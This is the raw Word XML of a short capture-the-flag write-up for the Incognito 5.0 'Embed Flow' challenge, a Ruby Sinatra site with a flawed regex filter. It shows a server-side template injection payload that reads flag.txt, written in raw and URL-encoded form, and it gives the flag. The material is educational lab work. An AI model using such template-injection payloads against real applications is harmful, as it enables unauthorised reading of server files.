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442" w:rsidRDefault="00575442" w:rsidP="0057544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8"/>
        <w:gridCol w:w="7466"/>
      </w:tblGrid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575442" w:rsidRDefault="0057544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75442" w:rsidRDefault="00575442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575442" w:rsidTr="00575442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Pr="00575442" w:rsidRDefault="00575442" w:rsidP="00575442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7544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 w:rsidP="0057544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Incognito 5.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00575442" w:rsidTr="00575442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Pr="00575442" w:rsidRDefault="00575442" w:rsidP="0057544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7544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 w:rsidP="00575442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575442">
              <w:t>Embed Flow</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00575442" w:rsidTr="00575442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 w:rsidP="0057544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 w:rsidP="0057544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575442" w:rsidRPr="00575442" w:rsidTr="00575442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 w:rsidP="0057544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https://ctftime.org/event/2316/tasks/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00575442" w:rsidRDefault="00575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https://github.com/daffainfo/ctf-writeup/tree/main/2024/Incognito%205.0</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00575442" w:rsidRDefault="00575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https://yocchin.hatenablog.com/entry/2024/04/21/223614</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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75442" w:rsidRDefault="0057544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575442" w:rsidRP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75442" w:rsidRDefault="00575442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575442">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="212529"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>This guy wants you to guess his favorite programming language, but missed setting up the pattern correctly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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75442" w:rsidRDefault="0057544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75442" w:rsidRDefault="0057544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575442" w:rsidRP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75442" w:rsidRDefault="00575442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We got a website and this website is using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Sinatara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(Ruby). Here is the preview of the challenge</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00575442" w:rsidRDefault="00575442" w:rsidP="00575442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68340" cy="4648200"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="1" name="Рисунок 1" descr="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340" cy="464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5442" w:rsidRDefault="00575442" w:rsidP="00575442">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
                <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00575442">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
                <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>If we try to input </w:t>
            </w:r>
            <w:r w:rsidRPr="00575442">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="00575442">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="E6EDF3"/>
                <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
              </w:rPr>
              <w:t> character, we'll get an error message like this:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00575442" w:rsidRDefault="00575442" w:rsidP="00575442">
            <w:pPr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22620" cy="4267200"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2" name="Рисунок 2" descr="testing-ph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esting-ph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5442" w:rsidRDefault="00575442" w:rsidP="00575442">
            <w:pPr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After seeing the regex pattern, I immediately knew this was similar to a HTB challenge called </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>Neonify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(</w:t>
            </w:r>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
                </w:rPr>
                <w:t>https://blog.devops.dev/ssti-bypass-filter-0-9a-z-i-08a5b3b98def</w:t>
              </w:r>
            </w:hyperlink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). So I used the same payload to read the </w:t>
            </w:r>
            <w:proofErr w:type="gram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flag :D</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w:rsidR="00575442" w:rsidRDefault="00575442" w:rsidP="00575442">
            <w:r>
              <w:t>test</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00575442" w:rsidRDefault="00575442" w:rsidP="00575442">
            <w:r>
              <w:t xml:space="preserve">&lt;%= </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>File.open</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>('flag.txt'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>).read</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> %&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00575442" w:rsidRDefault="00575442" w:rsidP="00575442">
            <w:r>
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:t>est</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00575442" w:rsidRDefault="00575442" w:rsidP="00575442">
            <w:pPr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And then encode it using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urlencode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and it will become</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00575442" w:rsidRDefault="00575442" w:rsidP="00575442">
            <w:r w:rsidRPr="00575442">
              <w:t>test%0A%3C%25=%20File.open('flag.txt'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00575442">
              <w:t>).read</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00575442">
              <w:t>%20%25%3E%0Atest</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00575442" w:rsidRDefault="00575442" w:rsidP="00575442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54512" cy="2875280"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="3" name="Рисунок 3" descr="f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l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2840" cy="288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5442" w:rsidRPr="00575442" w:rsidRDefault="00575442" w:rsidP="00575442">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00575442">
              <w:t>ictf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00575442">
              <w:t>{ruby_r3g3x_n3w_l1n3_4l3rt}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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442" w:rsidRDefault="0057544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442" w:rsidRDefault="0057544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575442" w:rsidTr="0057544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442" w:rsidRDefault="0057544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575442" w:rsidRDefault="00575442" w:rsidP="00575442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442"/>
    <w:rsid w:val="0057544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4E8A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{39D142F6-518B-4A1E-BC54-86A86A39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57544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57544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4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442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57544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57544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75442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75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544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5754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l-c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00575442"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00575442"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s1">
    <w:name w:val="pl-s1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00575442"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00575442"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00575442"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-en">
    <w:name w:val="pl-en"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00575442"/>
  </w:style>
  <w:style w:type="table" w:styleId="a5">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0057544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devops.dev/ssti-bypass-filter-0-9a-z-i-08a5b3b98de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daffainfo/ctf-writeup/tree/main/2024/Incognito%205.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tftime.org/event/2316/tasks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214</Words>
  <Characters>1221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2024-06-30T12:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-30T12:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>